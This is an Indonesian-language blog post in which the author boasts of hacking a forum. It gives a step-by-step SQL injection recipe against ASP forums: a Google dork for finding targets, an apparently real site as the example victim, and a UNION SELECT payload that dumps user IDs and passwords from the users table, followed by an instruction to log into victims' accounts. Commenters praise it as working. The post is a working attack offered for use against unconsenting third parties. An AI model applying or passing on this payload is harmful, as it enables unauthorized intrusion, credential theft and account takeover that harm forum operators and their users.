di atas adalah screenshot dari sebuah forum yang berhasil saya hack. namun ini hanya dasar dari sebuah SQL injection untuk forum. terlihat di sebelah iri ada USER ID dan di sebelahnya yang bertulisan DATED adalah PASSWORD beliau..
cara di atas yang saya lakukan di sebut "nakal" .. langkah yang perlu anda lakukan untuk menembus daftar user dan id dari sebuah forum asp ;
1. ketik pada pencarian google (mati sekajap) : inurl:/forums.asp?iFor=
2. setelah pencarian keluar carilah korban yang menurut anda tepat :
ex --->
http://blablabla/forum/forums.asp?iFor=11
3. hapus angka yang ada di belakang url sehingga menjadi :
http://www.siamrivers.com/forum/forums.asp?iFor=
4. lalu masukkan mantra SQL injection :
9+union+select+1,2,3,u_password,5,u_id,7,8,9+from+users
5. namun sebelumnya seperti sql injection kita harus mencari jumlah form/table dari forum tersebut
6. setelah berhasil maka secara otomatis masuk ke halam seperti gambar di atas
7. dan sesuai penjelasan di atas ada user dan id
8. login lah ke dalam salah satu akun user anda akan mendapati email nama pass dari akun tersebut
===========================================================
3 komentar:
numpang belajar gan. Salam kenal
ASLI, BENAR-BENAR BEKERJA
mantab gan
Post a Comment